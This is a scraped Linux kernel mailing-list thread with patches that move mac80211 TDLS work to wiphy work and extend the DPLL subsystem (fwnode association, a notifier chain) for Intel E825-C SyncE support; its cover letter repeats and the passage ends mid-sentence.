ieee80211_queue_work(&local->hw, - &sdata->work); + wiphy_work_queue(local->hw.wiphy, + &sdata->work); } } } else { diff --git a/net/mac80211/util.c b/net/mac80211/util.c index e60c8607e4b6..116a3e70582b 100644 --- a/net/mac80211/util.c +++ b/net/mac80211/util.c @@ -2751,7 +2751,7 @@ int ieee80211_reconfig(struct ieee80211_local *local) /* Requeue all works */ list_for_each_entry(sdata, &local->interfaces, list) - ieee80211_queue_work(&local->hw, &sdata->work); + wiphy_work_queue(local->hw.wiphy, &sdata->work); } ieee80211_wake_queues_by_reason(hw, IEEE80211_MAX_QUEUE_MAP, -- 2.53.0.rc2.2.g2258446484
From: Johannes Berg <johannes.berg@intel.com> [ Upstream commit 777b26002b73127e81643d9286fadf3d41e0e477 ] Again, to have the wiphy locked for it. Reviewed-by: Emmanuel Grumbach <emmanuel.grumbach@intel.com> Signed-off-by: Johannes Berg <johannes.berg@intel.com> [ Summary of conflict resolutions: - In mlme.c, move only tdls_peer_del_work to wiphy work, and none the other works ] Signed-off-by: Hanne-Lotta Mäenpää <hannelotta@gmail.com> --- net/mac80211/ieee80211_i.h | 4 ++-- net/mac80211/mlme.c | 7 ++++--- net/mac80211/tdls.c | 11 ++++++----- 3 files changed, 12 insertions(+), 10 deletions(-) diff --git a/net/mac80211/ieee80211_i.h b/net/mac80211/ieee80211_i.h index 6cc5bba2ba52..e94a370da4c4 100644 --- a/net/mac80211/ieee80211_i.h +++ b/net/mac80211/ieee80211_i.h @@ -531,7 +531,7 @@ struct ieee80211_if_managed { /* TDLS support */ u8 tdls_peer[ETH_ALEN] __aligned(2); - struct delayed_work tdls_peer_del_work; + struct wiphy_delayed_work tdls_peer_del_work; struct sk_buff *orig_teardown_skb; /* The original teardown skb */ struct sk_buff *teardown_skb; /* A copy to send through the AP */ spinlock_t teardown_lock; /* To lock changing teardown_skb */ @@ -2525,7 +2525,7 @@ int ieee80211_tdls_mgmt(struct wiphy *wiphy, struct net_device *dev, size_t extra_ies_len); int ieee80211_tdls_oper(struct wiphy *wiphy, struct net_device *dev, const u8 *peer, enum nl80211_tdls_operation oper); -void ieee80211_tdls_peer_del_work(struct work_struct *wk); +void ieee80211_tdls_peer_del_work(struct wiphy *wiphy, struct wiphy_work *wk); int ieee80211_tdls_channel_switch(struct wiphy *wiphy, struct net_device *dev, const u8 *addr, u8 oper_class, struct cfg80211_chan_def *chandef); diff --git a/net/mac80211/mlme.c b/net/mac80211/mlme.c index 8824460a2060..30db27df6b79 100644 --- a/net/mac80211/mlme.c +++ b/net/mac80211/mlme.c @@ -6517,8 +6517,8 @@ void ieee80211_sta_setup_sdata(struct ieee80211_sub_if_data *sdata) ieee80211_beacon_connection_loss_work); INIT_WORK(&ifmgd->csa_connection_drop_work, ieee80211_csa_connection_drop_work); - INIT_DELAYED_WORK(&ifmgd->tdls_peer_del_work, - ieee80211_tdls_peer_del_work); + wiphy_delayed_work_init(&ifmgd->tdls_peer_del_work, + ieee80211_tdls_peer_del_work); timer_setup(&ifmgd->timer, ieee80211_sta_timer, 0); timer_setup(&ifmgd->bcn_mon_timer, ieee80211_sta_bcn_mon_timer, 0); timer_setup(&ifmgd->conn_mon_timer, ieee80211_sta_conn_mon_timer, 0); @@ -7524,7 +7524,8 @@ void ieee80211_mgd_stop(struct ieee80211_sub_if_data *sdata) cancel_work_sync(&ifmgd->monitor_work); cancel_work_sync(&ifmgd->beacon_connection_loss_work); cancel_work_sync(&ifmgd->csa_connection_drop_work); - cancel_delayed_work_sync(&ifmgd->tdls_peer_del_work); + wiphy_delayed_work_cancel(sdata->local->hw.wiphy, + &ifmgd->tdls_peer_del_work); sdata_lock(sdata); if (ifmgd->assoc_data) diff --git a/net/mac80211/tdls.c b/net/mac80211/tdls.c index 04531d18fa93..1f07b598a6a1 100644 --- a/net/mac80211/tdls.c +++ b/net/mac80211/tdls.c @@ -21,7 +21,7 @@ /* give usermode some time for retries in setting up the TDLS session */ #define TDLS_PEER_SETUP_TIMEOUT (15 * HZ) -void ieee80211_tdls_peer_del_work(struct work_struct *wk) +void ieee80211_tdls_peer_del_work(struct wiphy *wiphy, struct wiphy_work *wk) { struct ieee80211_sub_if_data *sdata; struct ieee80211_local *local; @@ -1128,9 +1128,9 @@ ieee80211_tdls_mgmt_setup(struct wiphy *wiphy, struct net_device *dev, return ret; } - ieee80211_queue_delayed_work(&sdata->local->hw, - &sdata->u.mgd.tdls_peer_del_work, - TDLS_PEER_SETUP_TIMEOUT); + wiphy_delayed_work_queue(sdata->local->hw.wiphy, + &sdata->u.mgd.tdls_peer_del_work, + TDLS_PEER_SETUP_TIMEOUT); return 0; out_unlock: @@ -1427,7 +1427,8 @@ int ieee80211_tdls_oper(struct wiphy *wiphy, struct net_device *dev, } if (ret == 0 && ether_addr_equal(sdata->u.mgd.tdls_peer, peer)) { - cancel_delayed_work(&sdata->u.mgd.tdls_peer_del_work); + wiphy_delayed_work_cancel(sdata->local->hw.wiphy, + &sdata->u.mgd.tdls_peer_del_work); eth_zero_addr(sdata->u.mgd.tdls_peer); } -- 2.53.0.rc2.2.g2258446484
{ "author": "=?UTF-8?q?Hanne-Lotta=20M=C3=A4enp=C3=A4=C3=A4?= <hannelotta@gmail.com>", "date": "Mon, 2 Feb 2026 18:49:24 +0200", "thread_id": "20260202164924.215621-2-hannelotta@gmail.com.mbox.gz" }
lkml
[PATCH net-next v4 0/9] dpll: Core improvements and ice E825-C SyncE support
This series introduces Synchronous Ethernet (SyncE) support for the Intel E825-C Ethernet controller. Unlike previous generations where DPLL connections were implicitly assumed, the E825-C architecture relies on the platform firmware (ACPI) to describe the physical connections between the Ethernet controller and external DPLLs (such as the ZL3073x). To accommodate this, the series extends the DPLL subsystem to support firmware node (fwnode) associations, asynchronous discovery via notifiers, and dynamic pin management. Additionally, a significant refactor of the DPLL reference counting logic is included to ensure robustness and debuggability. DPLL Core Extensions: * Firmware Node Association: Pins can now be associated with a struct fwnode_handle after allocation via dpll_pin_fwnode_set(). This allows drivers to link pin objects with their corresponding DT/ACPI nodes. * Asynchronous Notifiers: A raw notifier chain is added to the DPLL core. This allows the Ethernet driver to subscribe to events and react when the platform DPLL driver registers the parent pins, resolving probe ordering dependencies. * Dynamic Indexing: Drivers can now request DPLL_PIN_IDX_UNSPEC to have the core automatically allocate a unique pin index. Reference Counting & Debugging: * Refactor: The reference counting logic in the core is consolidated. Internal list management helpers now automatically handle hold/put operations, removing fragile open-coded logic in the registration paths. * Reference Tracking: A new Kconfig option DPLL_REFCNT_TRACKER is added. This allows developers to instrument and debug reference leaks by recording stack traces for every get/put operation. Driver Updates: * zl3073x: Updated to associate pins with fwnode handles using the new setter and support the 'mux' pin type. * ice: Implements the E825-C specific hardware configuration for SyncE (CGU registers). It utilizes the new notifier and fwnode APIs to dynamically discover and attach to the platform DPLLs. Patch Summary: Patch 1: DPLL Core (fwnode association). Patch 2: Driver zl3073x (Set fwnode). Patch 3-4: DPLL Core (Notifiers and dynamic IDs). Patch 5: Driver zl3073x (Mux type). Patch 6: DPLL Core (Refcount refactor). Patch 7-8: Refcount tracking infrastructure and driver updates. Patch 9: Driver ice (E825-C SyncE logic). Changes in v4: * Fixed documentation and function stub issues found by AI Arkadiusz Kubalewski (1): ice: dpll: Support E825-C SyncE and dynamic pin discovery Ivan Vecera (7): dpll: Allow associating dpll pin with a firmware node dpll: zl3073x: Associate pin with fwnode handle dpll: Support dynamic pin index allocation dpll: zl3073x: Add support for mux pin type dpll: Enhance and consolidate reference counting logic dpll: Add reference count tracking support drivers: Add support for DPLL reference count tracking Petr Oros (1): dpll: Add notifier chain for dpll events drivers/dpll/Kconfig | 15 + drivers/dpll/dpll_core.c | 288 ++++++- drivers/dpll/dpll_core.h | 11 + drivers/dpll/dpll_netlink.c | 6 + drivers/dpll/zl3073x/dpll.c | 15 +- drivers/dpll/zl3073x/dpll.h | 2 + drivers/dpll/zl3073x/prop.c | 2 + drivers/net/ethernet/intel/ice/ice_dpll.c | 755 +++++++++++++++--- drivers/net/ethernet/intel/ice/ice_dpll.h | 30 + drivers/net/ethernet/intel/ice/ice_lib.c | 3 + drivers/net/ethernet/intel/ice/ice_ptp.c | 32 + drivers/net/ethernet/intel/ice/ice_ptp_hw.c | 9 +- drivers/net/ethernet/intel/ice/ice_tspll.c | 217 +++++ drivers/net/ethernet/intel/ice/ice_tspll.h | 13 +- drivers/net/ethernet/intel/ice/ice_type.h | 6 + .../net/ethernet/mellanox/mlx5/core/dpll.c | 16 +- drivers/ptp/ptp_ocp.c | 18 +- include/linux/dpll.h | 59 +- 18 files changed, 1347 insertions(+), 150 deletions(-) -- 2.52.0
Extend the DPLL core to support associating a DPLL pin with a firmware node. This association is required to allow other subsystems (such as network drivers) to locate and request specific DPLL pins defined in the Device Tree or ACPI. * Add a .fwnode field to the struct dpll_pin * Introduce dpll_pin_fwnode_set() helper to allow the provider driver to associate a pin with a fwnode after the pin has been allocated * Introduce fwnode_dpll_pin_find() helper to allow consumers to search for a registered DPLL pin using its associated fwnode handle * Ensure the fwnode reference is properly released in dpll_pin_put() Reviewed-by: Aleksandr Loktionov <aleksandr.loktionov@intel.com> Reviewed-by: Vadim Fedorenko <vadim.fedorenko@linux.dev> Signed-off-by: Ivan Vecera <ivecera@redhat.com> --- v4: * fixed fwnode_dpll_pin_find() return value description --- drivers/dpll/dpll_core.c | 49 ++++++++++++++++++++++++++++++++++++++++ drivers/dpll/dpll_core.h | 2 ++ include/linux/dpll.h | 11 +++++++++ 3 files changed, 62 insertions(+) diff --git a/drivers/dpll/dpll_core.c b/drivers/dpll/dpll_core.c index 8879a72351561..f04ed7195cadd 100644 --- a/drivers/dpll/dpll_core.c +++ b/drivers/dpll/dpll_core.c @@ -10,6 +10,7 @@ #include <linux/device.h> #include <linux/err.h> +#include <linux/property.h> #include <linux/slab.h> #include <linux/string.h> @@ -595,12 +596,60 @@ void dpll_pin_put(struct dpll_pin *pin) xa_destroy(&pin->parent_refs); xa_destroy(&pin->ref_sync_pins); dpll_pin_prop_free(&pin->prop); + fwnode_handle_put(pin->fwnode); kfree_rcu(pin, rcu); } mutex_unlock(&dpll_lock); } EXPORT_SYMBOL_GPL(dpll_pin_put); +/** + * dpll_pin_fwnode_set - set dpll pin firmware node reference + * @pin: pointer to a dpll pin + * @fwnode: firmware node handle + * + * Set firmware node handle for the given dpll pin. + */ +void dpll_pin_fwnode_set(struct dpll_pin *pin, struct fwnode_handle *fwnode) +{ + mutex_lock(&dpll_lock); + fwnode_handle_put(pin->fwnode); /* Drop fwnode previously set */ + pin->fwnode = fwnode_handle_get(fwnode); + mutex_unlock(&dpll_lock); +} +EXPORT_SYMBOL_GPL(dpll_pin_fwnode_set); + +/** + * fwnode_dpll_pin_find - find dpll pin by firmware node reference + * @fwnode: reference to firmware node + * + * Get existing object of a pin that is associated with given firmware node + * reference. + * + * Context: Acquires a lock (dpll_lock) + * Return: + * * valid dpll_pin pointer on success + * * NULL when no such pin exists + */ +struct dpll_pin *fwnode_dpll_pin_find(struct fwnode_handle *fwnode) +{ + struct dpll_pin *pin, *ret = NULL; + unsigned long index; + + mutex_lock(&dpll_lock); + xa_for_each(&dpll_pin_xa, index, pin) { + if (pin->fwnode == fwnode) { + ret = pin; + refcount_inc(&ret->refcount); + break; + } + } + mutex_unlock(&dpll_lock); + + return ret; +} +EXPORT_SYMBOL_GPL(fwnode_dpll_pin_find); + static int __dpll_pin_register(struct dpll_device *dpll, struct dpll_pin *pin, const struct dpll_pin_ops *ops, void *priv, void *cookie) diff --git a/drivers/dpll/dpll_core.h b/drivers/dpll/dpll_core.h index 8ce969bbeb64e..d3e17ff0ecef0 100644 --- a/drivers/dpll/dpll_core.h +++ b/drivers/dpll/dpll_core.h @@ -42,6 +42,7 @@ struct dpll_device { * @pin_idx: index of a pin given by dev driver * @clock_id: clock_id of creator * @module: module of creator + * @fwnode: optional reference to firmware node * @dpll_refs: hold referencees to dplls pin was registered with * @parent_refs: hold references to parent pins pin was registered with * @ref_sync_pins: hold references to pins for Reference SYNC feature @@ -54,6 +55,7 @@ struct dpll_pin { u32 pin_idx; u64 clock_id; struct module *module; + struct fwnode_handle *fwnode; struct xarray dpll_refs; struct xarray parent_refs; struct xarray ref_sync_pins; diff --git a/include/linux/dpll.h b/include/linux/dpll.h index c6d0248fa5273..f2e8660e90cdf 100644 --- a/include/linux/dpll.h +++ b/include/linux/dpll.h @@ -16,6 +16,7 @@ struct dpll_device; struct dpll_pin; struct dpll_pin_esync; +struct fwnode_handle; struct dpll_device_ops { int (*mode_get)(const struct dpll_device *dpll, void *dpll_priv, @@ -178,6 +179,8 @@ void dpll_netdev_pin_clear(struct net_device *dev); size_t dpll_netdev_pin_handle_size(const struct net_device *dev); int dpll_netdev_add_pin_handle(struct sk_buff *msg, const struct net_device *dev); + +struct dpll_pin *fwnode_dpll_pin_find(struct fwnode_handle *fwnode); #else static inline void dpll_netdev_pin_set(struct net_device *dev, struct dpll_pin *dpll_pin) { } @@ -193,6 +196,12 @@ dpll_netdev_add_pin_handle(struct sk_buff *msg, const struct net_device *dev) { return 0; } + +static inline struct dpll_pin * +fwnode_dpll_pin_find(struct fwnode_handle *fwnode) +{ + return NULL; +} #endif struct dpll_device * @@ -218,6 +227,8 @@ void dpll_pin_unregister(struct dpll_device *dpll, struct dpll_pin *pin, void dpll_pin_put(struct dpll_pin *pin); +void dpll_pin_fwnode_set(struct dpll_pin *pin, struct fwnode_handle *fwnode); + int dpll_pin_on_pin_register(struct dpll_pin *parent, struct dpll_pin *pin, const struct dpll_pin_ops *ops, void *priv); -- 2.52.0
{ "author": "Ivan Vecera <ivecera@redhat.com>", "date": "Mon, 2 Feb 2026 18:16:30 +0100", "thread_id": "20260202171638.17427-4-ivecera@redhat.com.mbox.gz" }
lkml
[PATCH net-next v4 0/9] dpll: Core improvements and ice E825-C SyncE support
This series introduces Synchronous Ethernet (SyncE) support for the Intel E825-C Ethernet controller. Unlike previous generations where DPLL connections were implicitly assumed, the E825-C architecture relies on the platform firmware (ACPI) to describe the physical connections between the Ethernet controller and external DPLLs (such as the ZL3073x). To accommodate this, the series extends the DPLL subsystem to support firmware node (fwnode) associations, asynchronous discovery via notifiers, and dynamic pin management. Additionally, a significant refactor of the DPLL reference counting logic is included to ensure robustness and debuggability. DPLL Core Extensions: * Firmware Node Association: Pins can now be associated with a struct fwnode_handle after allocation via dpll_pin_fwnode_set(). This allows drivers to link pin objects with their corresponding DT/ACPI nodes. * Asynchronous Notifiers: A raw notifier chain is added to the DPLL core. This allows the Ethernet driver to subscribe to events and react when the platform DPLL driver registers the parent pins, resolving probe ordering dependencies. * Dynamic Indexing: Drivers can now request DPLL_PIN_IDX_UNSPEC to have the core automatically allocate a unique pin index. Reference Counting & Debugging: * Refactor: The reference counting logic in the core is consolidated. Internal list management helpers now automatically handle hold/put operations, removing fragile open-coded logic in the registration paths. * Reference Tracking: A new Kconfig option DPLL_REFCNT_TRACKER is added. This allows developers to instrument and debug reference leaks by recording stack traces for every get/put operation. Driver Updates: * zl3073x: Updated to associate pins with fwnode handles using the new setter and support the 'mux' pin type. * ice: Implements the E825-C specific hardware configuration for SyncE (CGU registers). It utilizes the new notifier and fwnode APIs to dynamically discover and attach to the platform DPLLs. Patch Summary: Patch 1: DPLL Core (fwnode association). Patch 2: Driver zl3073x (Set fwnode). Patch 3-4: DPLL Core (Notifiers and dynamic IDs). Patch 5: Driver zl3073x (Mux type). Patch 6: DPLL Core (Refcount refactor). Patch 7-8: Refcount tracking infrastructure and driver updates. Patch 9: Driver ice (E825-C SyncE logic). Changes in v4: * Fixed documentation and function stub issues found by AI Arkadiusz Kubalewski (1): ice: dpll: Support E825-C SyncE and dynamic pin discovery Ivan Vecera (7): dpll: Allow associating dpll pin with a firmware node dpll: zl3073x: Associate pin with fwnode handle dpll: Support dynamic pin index allocation dpll: zl3073x: Add support for mux pin type dpll: Enhance and consolidate reference counting logic dpll: Add reference count tracking support drivers: Add support for DPLL reference count tracking Petr Oros (1): dpll: Add notifier chain for dpll events drivers/dpll/Kconfig | 15 + drivers/dpll/dpll_core.c | 288 ++++++- drivers/dpll/dpll_core.h | 11 + drivers/dpll/dpll_netlink.c | 6 + drivers/dpll/zl3073x/dpll.c | 15 +- drivers/dpll/zl3073x/dpll.h | 2 + drivers/dpll/zl3073x/prop.c | 2 + drivers/net/ethernet/intel/ice/ice_dpll.c | 755 +++++++++++++++--- drivers/net/ethernet/intel/ice/ice_dpll.h | 30 + drivers/net/ethernet/intel/ice/ice_lib.c | 3 + drivers/net/ethernet/intel/ice/ice_ptp.c | 32 + drivers/net/ethernet/intel/ice/ice_ptp_hw.c | 9 +- drivers/net/ethernet/intel/ice/ice_tspll.c | 217 +++++ drivers/net/ethernet/intel/ice/ice_tspll.h | 13 +- drivers/net/ethernet/intel/ice/ice_type.h | 6 + .../net/ethernet/mellanox/mlx5/core/dpll.c | 16 +- drivers/ptp/ptp_ocp.c | 18 +- include/linux/dpll.h | 59 +- 18 files changed, 1347 insertions(+), 150 deletions(-) -- 2.52.0
Associate the registered DPLL pin with its firmware node by calling dpll_pin_fwnode_set(). This links the created pin object to its corresponding DT/ACPI node in the DPLL core. Consequently, this enables consumer drivers (such as network drivers) to locate and request this specific pin using the fwnode_dpll_pin_find() helper. Reviewed-by: Aleksandr Loktionov <aleksandr.loktionov@intel.com> Signed-off-by: Ivan Vecera <ivecera@redhat.com> --- drivers/dpll/zl3073x/dpll.c | 1 + 1 file changed, 1 insertion(+) diff --git a/drivers/dpll/zl3073x/dpll.c b/drivers/dpll/zl3073x/dpll.c index 7d8ed948b9706..9eed21088adac 100644 --- a/drivers/dpll/zl3073x/dpll.c +++ b/drivers/dpll/zl3073x/dpll.c @@ -1485,6 +1485,7 @@ zl3073x_dpll_pin_register(struct zl3073x_dpll_pin *pin, u32 index) rc = PTR_ERR(pin->dpll_pin); goto err_pin_get; } + dpll_pin_fwnode_set(pin->dpll_pin, props->fwnode); if (zl3073x_dpll_is_input_pin(pin)) ops = &zl3073x_dpll_input_pin_ops; -- 2.52.0
{ "author": "Ivan Vecera <ivecera@redhat.com>", "date": "Mon, 2 Feb 2026 18:16:31 +0100", "thread_id": "20260202171638.17427-4-ivecera@redhat.com.mbox.gz" }
lkml
[PATCH net-next v4 0/9] dpll: Core improvements and ice E825-C SyncE support
This series introduces Synchronous Ethernet (SyncE) support for the Intel E825-C Ethernet controller. Unlike previous generations where DPLL connections were implicitly assumed, the E825-C architecture relies on the platform firmware (ACPI) to describe the physical connections between the Ethernet controller and external DPLLs (such as the ZL3073x). To accommodate this, the series extends the DPLL subsystem to support firmware node (fwnode) associations, asynchronous discovery via notifiers, and dynamic pin management. Additionally, a significant refactor of the DPLL reference counting logic is included to ensure robustness and debuggability. DPLL Core Extensions: * Firmware Node Association: Pins can now be associated with a struct fwnode_handle after allocation via dpll_pin_fwnode_set(). This allows drivers to link pin objects with their corresponding DT/ACPI nodes. * Asynchronous Notifiers: A raw notifier chain is added to the DPLL core. This allows the Ethernet driver to subscribe to events and react when the platform DPLL driver registers the parent pins, resolving probe ordering dependencies. * Dynamic Indexing: Drivers can now request DPLL_PIN_IDX_UNSPEC to have the core automatically allocate a unique pin index. Reference Counting & Debugging: * Refactor: The reference counting logic in the core is consolidated. Internal list management helpers now automatically handle hold/put operations, removing fragile open-coded logic in the registration paths. * Reference Tracking: A new Kconfig option DPLL_REFCNT_TRACKER is added. This allows developers to instrument and debug reference leaks by recording stack traces for every get/put operation. Driver Updates: * zl3073x: Updated to associate pins with fwnode handles using the new setter and support the 'mux' pin type. * ice: Implements the E825-C specific hardware configuration for SyncE (CGU registers). It utilizes the new notifier and fwnode APIs to dynamically discover and attach to the platform DPLLs. Patch Summary: Patch 1: DPLL Core (fwnode association). Patch 2: Driver zl3073x (Set fwnode). Patch 3-4: DPLL Core (Notifiers and dynamic IDs). Patch 5: Driver zl3073x (Mux type). Patch 6: DPLL Core (Refcount refactor). Patch 7-8: Refcount tracking infrastructure and driver updates. Patch 9: Driver ice (E825-C SyncE logic). Changes in v4: * Fixed documentation and function stub issues found by AI Arkadiusz Kubalewski (1): ice: dpll: Support E825-C SyncE and dynamic pin discovery Ivan Vecera (7): dpll: Allow associating dpll pin with a firmware node dpll: zl3073x: Associate pin with fwnode handle dpll: Support dynamic pin index allocation dpll: zl3073x: Add support for mux pin type dpll: Enhance and consolidate reference counting logic dpll: Add reference count tracking support drivers: Add support for DPLL reference count tracking Petr Oros (1): dpll: Add notifier chain for dpll events drivers/dpll/Kconfig | 15 + drivers/dpll/dpll_core.c | 288 ++++++- drivers/dpll/dpll_core.h | 11 + drivers/dpll/dpll_netlink.c | 6 + drivers/dpll/zl3073x/dpll.c | 15 +- drivers/dpll/zl3073x/dpll.h | 2 + drivers/dpll/zl3073x/prop.c | 2 + drivers/net/ethernet/intel/ice/ice_dpll.c | 755 +++++++++++++++--- drivers/net/ethernet/intel/ice/ice_dpll.h | 30 + drivers/net/ethernet/intel/ice/ice_lib.c | 3 + drivers/net/ethernet/intel/ice/ice_ptp.c | 32 + drivers/net/ethernet/intel/ice/ice_ptp_hw.c | 9 +- drivers/net/ethernet/intel/ice/ice_tspll.c | 217 +++++ drivers/net/ethernet/intel/ice/ice_tspll.h | 13 +- drivers/net/ethernet/intel/ice/ice_type.h | 6 + .../net/ethernet/mellanox/mlx5/core/dpll.c | 16 +- drivers/ptp/ptp_ocp.c | 18 +- include/linux/dpll.h | 59 +- 18 files changed, 1347 insertions(+), 150 deletions(-) -- 2.52.0
From: Petr Oros <poros@redhat.com> Currently, the DPLL subsystem reports events (creation, deletion, changes) to userspace via Netlink. However, there is no mechanism for other kernel components to be notified of these events directly. Add a raw notifier chain to the DPLL core protected by dpll_lock. This allows other kernel subsystems or drivers to register callbacks and receive notifications when DPLL devices or pins are created, deleted, or modified. Define the following: - Registration helpers: {,un}register_dpll_notifier() - Event types: DPLL_DEVICE_CREATED, DPLL_PIN_CREATED, etc. - Context structures: dpll_{device,pin}_notifier_info to pass relevant data to the listeners. The notification chain is invoked alongside the existing Netlink event generation to ensure in-kernel listeners are kept in sync with the subsystem state. Reviewed-by: Vadim Fedorenko <vadim.fedorenko@linux.dev> Co-developed-by: Ivan Vecera <ivecera@redhat.com> Signed-off-by: Ivan Vecera <ivecera@redhat.com> Signed-off-by: Petr Oros <poros@redhat.com> --- drivers/dpll/dpll_core.c | 57 +++++++++++++++++++++++++++++++++++++ drivers/dpll/dpll_core.h | 4 +++ drivers/dpll/dpll_netlink.c | 6 ++++ include/linux/dpll.h | 29 +++++++++++++++++++ 4 files changed, 96 insertions(+) diff --git a/drivers/dpll/dpll_core.c b/drivers/dpll/dpll_core.c index f04ed7195cadd..b05fe2ba46d91 100644 --- a/drivers/dpll/dpll_core.c +++ b/drivers/dpll/dpll_core.c @@ -23,6 +23,8 @@ DEFINE_MUTEX(dpll_lock); DEFINE_XARRAY_FLAGS(dpll_device_xa, XA_FLAGS_ALLOC); DEFINE_XARRAY_FLAGS(dpll_pin_xa, XA_FLAGS_ALLOC); +static RAW_NOTIFIER_HEAD(dpll_notifier_chain); + static u32 dpll_device_xa_id; static u32 dpll_pin_xa_id; @@ -46,6 +48,39 @@ struct dpll_pin_registration { void *cookie; }; +static int call_dpll_notifiers(unsigned long action, void *info) +{ + lockdep_assert_held(&dpll_lock); + return raw_notifier_call_chain(&dpll_notifier_chain, action, info); +} + +void dpll_device_notify(struct dpll_device *dpll, unsigned long action) +{ + struct dpll_device_notifier_info info = { + .dpll = dpll, + .id = dpll->id, + .idx = dpll->device_idx, + .clock_id = dpll->clock_id, + .type = dpll->type, + }; + + call_dpll_notifiers(action, &info); +} + +void dpll_pin_notify(struct dpll_pin *pin, unsigned long action) +{ + struct dpll_pin_notifier_info info = { + .pin = pin, + .id = pin->id, + .idx = pin->pin_idx, + .clock_id = pin->clock_id, + .fwnode = pin->fwnode, + .prop = &pin->prop, + }; + + call_dpll_notifiers(action, &info); +} + struct dpll_device *dpll_device_get_by_id(int id) { if (xa_get_mark(&dpll_device_xa, id, DPLL_REGISTERED)) @@ -539,6 +574,28 @@ void dpll_netdev_pin_clear(struct net_device *dev) } EXPORT_SYMBOL(dpll_netdev_pin_clear); +int register_dpll_notifier(struct notifier_block *nb) +{ + int ret; + + mutex_lock(&dpll_lock); + ret = raw_notifier_chain_register(&dpll_notifier_chain, nb); + mutex_unlock(&dpll_lock); + return ret; +} +EXPORT_SYMBOL_GPL(register_dpll_notifier); + +int unregister_dpll_notifier(struct notifier_block *nb) +{ + int ret; + + mutex_lock(&dpll_lock); + ret = raw_notifier_chain_unregister(&dpll_notifier_chain, nb); + mutex_unlock(&dpll_lock); + return ret; +} +EXPORT_SYMBOL_GPL(unregister_dpll_notifier); + /** * dpll_pin_get - find existing or create new dpll pin * @clock_id: clock_id of creator diff --git a/drivers/dpll/dpll_core.h b/drivers/dpll/dpll_core.h index d3e17ff0ecef0..b7b4bb251f739 100644 --- a/drivers/dpll/dpll_core.h +++ b/drivers/dpll/dpll_core.h @@ -91,4 +91,8 @@ struct dpll_pin_ref *dpll_xa_ref_dpll_first(struct xarray *xa_refs); extern struct xarray dpll_device_xa; extern struct xarray dpll_pin_xa; extern struct mutex dpll_lock; + +void dpll_device_notify(struct dpll_device *dpll, unsigned long action); +void dpll_pin_notify(struct dpll_pin *pin, unsigned long action); + #endif diff --git a/drivers/dpll/dpll_netlink.c b/drivers/dpll/dpll_netlink.c index 904199ddd1781..83cbd64abf5a4 100644 --- a/drivers/dpll/dpll_netlink.c +++ b/drivers/dpll/dpll_netlink.c @@ -761,17 +761,20 @@ dpll_device_event_send(enum dpll_cmd event, struct dpll_device *dpll) int dpll_device_create_ntf(struct dpll_device *dpll) { + dpll_device_notify(dpll, DPLL_DEVICE_CREATED); return dpll_device_event_send(DPLL_CMD_DEVICE_CREATE_NTF, dpll); } int dpll_device_delete_ntf(struct dpll_device *dpll) { + dpll_device_notify(dpll, DPLL_DEVICE_DELETED); return dpll_device_event_send(DPLL_CMD_DEVICE_DELETE_NTF, dpll); } static int __dpll_device_change_ntf(struct dpll_device *dpll) { + dpll_device_notify(dpll, DPLL_DEVICE_CHANGED); return dpll_device_event_send(DPLL_CMD_DEVICE_CHANGE_NTF, dpll); } @@ -829,16 +832,19 @@ dpll_pin_event_send(enum dpll_cmd event, struct dpll_pin *pin) int dpll_pin_create_ntf(struct dpll_pin *pin) { + dpll_pin_notify(pin, DPLL_PIN_CREATED); return dpll_pin_event_send(DPLL_CMD_PIN_CREATE_NTF, pin); } int dpll_pin_delete_ntf(struct dpll_pin *pin) { + dpll_pin_notify(pin, DPLL_PIN_DELETED); return dpll_pin_event_send(DPLL_CMD_PIN_DELETE_NTF, pin); } int __dpll_pin_change_ntf(struct dpll_pin *pin) { + dpll_pin_notify(pin, DPLL_PIN_CHANGED); return dpll_pin_event_send(DPLL_CMD_PIN_CHANGE_NTF, pin); } diff --git a/include/linux/dpll.h b/include/linux/dpll.h index f2e8660e90cdf..8ed90dfc65f05 100644 --- a/include/linux/dpll.h +++ b/include/linux/dpll.h @@ -11,6 +11,7 @@ #include <linux/device.h> #include <linux/netlink.h> #include <linux/netdevice.h> +#include <linux/notifier.h> #include <linux/rtnetlink.h> struct dpll_device; @@ -172,6 +173,30 @@ struct dpll_pin_properties { u32 phase_gran; }; +#define DPLL_DEVICE_CREATED 1 +#define DPLL_DEVICE_DELETED 2 +#define DPLL_DEVICE_CHANGED 3 +#define DPLL_PIN_CREATED 4 +#define DPLL_PIN_DELETED 5 +#define DPLL_PIN_CHANGED 6 + +struct dpll_device_notifier_info { + struct dpll_device *dpll; + u32 id; + u32 idx; + u64 clock_id; + enum dpll_type type; +}; + +struct dpll_pin_notifier_info { + struct dpll_pin *pin; + u32 id; + u32 idx; + u64 clock_id; + const struct fwnode_handle *fwnode; + const struct dpll_pin_properties *prop; +}; + #if IS_ENABLED(CONFIG_DPLL) void dpll_netdev_pin_set(struct net_device *dev, struct dpll_pin *dpll_pin); void dpll_netdev_pin_clear(struct net_device *dev); @@ -242,4 +267,8 @@ int dpll_device_change_ntf(struct dpll_device *dpll); int dpll_pin_change_ntf(struct dpll_pin *pin); +int register_dpll_notifier(struct notifier_block *nb); + +int unregister_dpll_notifier(struct notifier_block *nb); + #endif -- 2.52.0
{ "author": "Ivan Vecera <ivecera@redhat.com>", "date": "Mon, 2 Feb 2026 18:16:32 +0100", "thread_id": "20260202171638.17427-4-ivecera@redhat.com.mbox.gz" }
lkml
[PATCH net-next v4 0/9] dpll: Core improvements and ice E825-C SyncE support
This series introduces Synchronous Ethernet (SyncE) support for the Intel E825-C Ethernet controller. Unlike previous generations where DPLL connections were implicitly assumed, the E825-C architecture relies on the platform firmware (ACPI) to describe the physical connections between the Ethernet controller and external DPLLs (such as the ZL3073x). To accommodate this, the series extends the DPLL subsystem to support firmware node (fwnode) associations, asynchronous discovery via notifiers, and dynamic pin management. Additionally, a significant refactor of the DPLL reference counting logic is included to ensure robustness and debuggability. DPLL Core Extensions: * Firmware Node Association: Pins can now be associated with a struct fwnode_handle after allocation via dpll_pin_fwnode_set(). This allows drivers to link pin objects with their corresponding DT/ACPI nodes. * Asynchronous Notifiers: A raw notifier chain is added to the DPLL core. This allows the Ethernet driver to subscribe to events and react when the platform DPLL driver registers the parent pins, resolving probe ordering dependencies. * Dynamic Indexing: Drivers can now request DPLL_PIN_IDX_UNSPEC to have the core automatically allocate a unique pin index. Reference Counting & Debugging: * Refactor: The reference counting logic in the core is consolidated. Internal list management helpers now automatically handle hold/put operations, removing fragile open-coded logic in the registration paths. * Reference Tracking: A new Kconfig option DPLL_REFCNT_TRACKER is added. This allows developers to instrument and debug reference leaks by recording stack traces for every get/put 